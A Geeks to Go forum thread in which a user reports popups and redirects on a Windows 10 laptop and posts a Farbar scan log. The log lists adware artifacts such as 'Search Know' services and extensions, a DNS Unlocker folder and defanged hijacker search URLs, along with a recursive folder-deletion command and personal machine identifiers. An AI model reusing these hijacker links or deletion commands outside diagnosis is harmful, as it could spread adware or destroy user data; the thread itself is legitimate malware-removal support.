Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Malware Infected [Solved]


  • This topic is locked This topic is locked

#1
JonKaz

JonKaz

    New Member

  • Member
  • Pip
  • 6 posts

Every time I go online - a multitude of popups come up along with warnings that my computer is infected. I know not to click on those.

Redirected to unintended websites.

 

Complete hijack.

 

FRST Logs below.

 

Appreciate any help.

 

Thanks so much,

Jon K.

 

 

OS Name Microsoft Windows 10 Home
Version 10.0.10586 Build 10586
Other OS Description Not Available
OS Manufacturer Microsoft Corporation
System Name DESKTOP-FDU3B24
System Manufacturer HP
System Model HP Pavilion Notebook
System Type x64-based PC
System SKU P1A76UA#ABA
Processor Intel® Core™ i5-5200U CPU @ 2.20GHz, 2195 Mhz, 2 Core(s), 4 Logical Processor(s)
BIOS Version/Date Insyde F.42, 8/4/2015
SMBIOS Version 2.8
Embedded Controller Version 89.36
BIOS Mode UEFI

Edited by JonKaz, 19 February 2016 - 06:14 PM.
Edited to remove e-mail address

  • 0

Advertisements


#2
JonKaz

JonKaz

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts

Here are the FRST files:

 

FRST.txt

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:17-02-2016

Ran by Jonathan (administrator) on DESKTOP-FDU3B24 (19-02-2016 15:32:58)
Running from C:\Users\Jonathan\Downloads
Loaded Profiles: Jonathan (Available Profiles: Jonathan)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Opera)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
() C:\Program Files\AVAST Software\SecureLine\vpnsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(PDFConverter.com) C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PDFConverterElite.PrnDisp.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(PDFConverter.com) C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PCENotifier.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(AVAST Software) C:\Program Files\AVAST Software\SecureLine\secureline.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera_crashreporter.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Microsoft Corporation) C:\Windows\System32\msinfo32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
() C:\Program Files (x86)\Common Files\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\updater.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe
(Microsoft Corporation) C:\Windows\System32\SnippingTool.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.201.11370.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
() C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1601.49020.0_x64__8wekyb3d8bbwe\Calculator.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugincontainer.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\3\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\5\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\6\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\10\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\8\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\7\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\7\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\3\Plugin.exe
() C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\2\Plugin.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8510680 2015-07-27] (Realtek Semiconductor)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3945656 2015-10-31] (Synaptics Incorporated)
HKLM\...\Run: [PDF Converter Elite 4.0 Print Dispatcher] => C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PDFConverterElite.PrnDisp.exe [9742040 2016-01-04] (PDFConverter.com)
HKLM\...\Run: [PDF Converter Elite 4.0 Notifier] => C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PCENotifier.exe [1231576 2016-01-04] (PDFConverter.com)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [127528 2015-07-08] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [653576 2015-06-29] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [PowerDVD14Agent] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe [795336 2015-06-21] (CyberLink Corp.)
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\...\RunOnce: [Uninstall C:\Users\Jonathan\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Jonathan\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ca94292e-303f-4358-9c9a-bb0b532e4af4}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlE6T1pU
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlE6T1pU
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://hp15-comm.msn.com/?pc=HRTE
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms}
SearchScopes: HKLM-x32 -> {717FAF8D-04D7-4787-9DDE-7002B2B3BB74} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2478984944-2039465796-333368353-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2478984944-2039465796-333368353-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2478984944-2039465796-333368353-1001 -> {717FAF8D-04D7-4787-9DDE-7002B2B3BB74} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2478984944-2039465796-333368353-1001 -> {790434CC-5663-447A-9025-489842992A89} URL = hxxps://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=531140&p={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2016-01-18] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2016-01-18] (Microsoft Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-04-30] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Search Know -> {cdc9b2b6-5796-4d44-bc7a-2fa644057d7f} -> C:\Program Files (x86)\Search Know\Extensions\cdc9b2b6-5796-4d44-bc7a-2fa644057d7f.dll [2016-01-15] ()
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1217157.dll [2015-02-05] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-01-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\2\NP_wtapp.dll [2016-01-05] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
CHR StartupUrls: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
      
CHR DefaultSearchURL: Default -> hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTQkcFME0FBloEURNNfWpdAEsSSX5NL04=&q={searchTerms}
CHR DefaultSearchKeyword: Default -> searchinterneat-a.akamaihd.net
CHR DefaultNewTabURL: Default -> hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFFCcl8IVF1IDFRFIlgVVQAXQxgbc1gMTA4VFQRBIw5cVApGQxNBNARaAktXUUEeJ1pNER8fHGZGIUtbCXIfTkI=
CHR Profile: C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-10-31]
CHR Extension: (Docs) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-31]
CHR Extension: (Google Drive) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-31]
CHR Extension: (YouTube) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-31]
CHR Extension: (Google Search) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Search Know) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnmdibcplkbnbcddemobbmojbmjmpeg [2016-01-15] [UpdateUrl: hxxp://cdn.searchitknow.com/update] <==== ATTENTION
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-10-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-10-31]
CHR Extension: (Gmail) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-10-31]
 
Opera: 
=======
OPR StartupUrls: "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
OPR Extension: (Search Know) - C:\Users\Jonathan\AppData\Roaming\Opera Software\Opera Stable\Extensions\fjnmdibcplkbnbcddemobbmojbmjmpeg [2016-01-15]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2772720 2016-01-17] (Microsoft Corporation)
R2 esifsvc; C:\Windows\SysWOW64\esif_uf.exe [1385640 2015-07-19] (Intel Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2016-01-05] (WildTangent)
R2 HPSupportSolutionsFrameworkService; c:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [602888 2015-06-29] (Hewlett-Packard Development Company, L.P.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [350312 2015-07-17] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [223520 2015-07-11] (Intel Corporation)
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [298200 2015-07-27] (Realtek Semiconductor)
R2 SecureLine; C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe [452456 2016-01-01] ()
R2 Service Mgr SearchKnow; C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugincontainer.exe [1418464 2016-02-19] () <==== ATTENTION
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-10-31] (Synaptics Incorporated)
R2 Update Mgr SearchKnow; C:\Program Files (x86)\Common Files\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\updater.exe [1277152 2016-02-19] () <==== ATTENTION
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 clwvd6; C:\Windows\system32\DRIVERS\clwvd6.sys [41704 2013-10-29] (CyberLink Corporation)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R3 dptf_cpu; C:\Windows\System32\drivers\dptf_cpu.sys [43000 2015-07-19] (Intel Corporation)
R3 esif_lf; C:\Windows\system32\DRIVERS\esif_lf.sys [251384 2015-07-19] (Intel Corporation)
R0 IntelHSWPcc; C:\Windows\System32\drivers\IntelPcc.sys [88256 2015-07-21] (Intel Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184608 2015-07-07] (Intel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [886528 2015-06-01] (Realtek                                            )
S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [753368 2015-07-21] (Realsil Semiconductor Corporation)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [4619520 2015-07-22] (Realtek Semiconductor Corporation                           )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [33448 2015-07-27] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-10-31] (Synaptics Incorporated)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver64; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [30384 2015-06-23] (HP Inc.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-19 15:32 - 2016-02-19 15:33 - 00022882 _____ C:\Users\Jonathan\Downloads\FRST.txt
2016-02-19 15:32 - 2016-02-19 15:32 - 02371072 _____ (Farbar) C:\Users\Jonathan\Downloads\FRST64.exe
2016-02-19 15:32 - 2016-02-19 15:32 - 00000000 ____D C:\FRST
2016-02-19 12:45 - 2016-02-19 12:53 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-02-19 12:44 - 2016-02-19 12:44 - 00000000 ____D C:\WINDOWS\pss
2016-02-19 09:11 - 2016-02-19 09:11 - 00000000 ____D C:\$SysReset
2016-02-19 08:25 - 2016-02-19 08:25 - 00000000 ____D C:\ProgramData\54070cb8-2431-0
2016-02-19 08:20 - 2016-02-19 11:45 - 00000000 ____D C:\Program Files (x86)\DNS Unlocker
2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\54070cb8-6861-0
2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{2b04c619-412c-1}
2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{08be3c40-312c-0}
2016-02-17 15:10 - 2016-02-17 15:10 - 00388478 _____ C:\Users\Jonathan\Downloads\Baroque.ppsx
2016-02-04 10:44 - 2016-02-04 10:44 - 00961103 _____ C:\Users\Jonathan\Downloads\SCC Middle Ages and Renaissance (1).ppsx
2016-02-03 19:11 - 2016-02-03 19:12 - 00961103 _____ C:\Users\Jonathan\Downloads\SCC Middle Ages and Renaissance.ppsx
2016-02-02 17:40 - 2016-02-02 17:40 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2016-01-31 09:26 - 2016-01-16 01:23 - 08728920 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-01-31 09:26 - 2016-01-16 01:20 - 06971752 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-01-31 09:26 - 2016-01-16 00:45 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
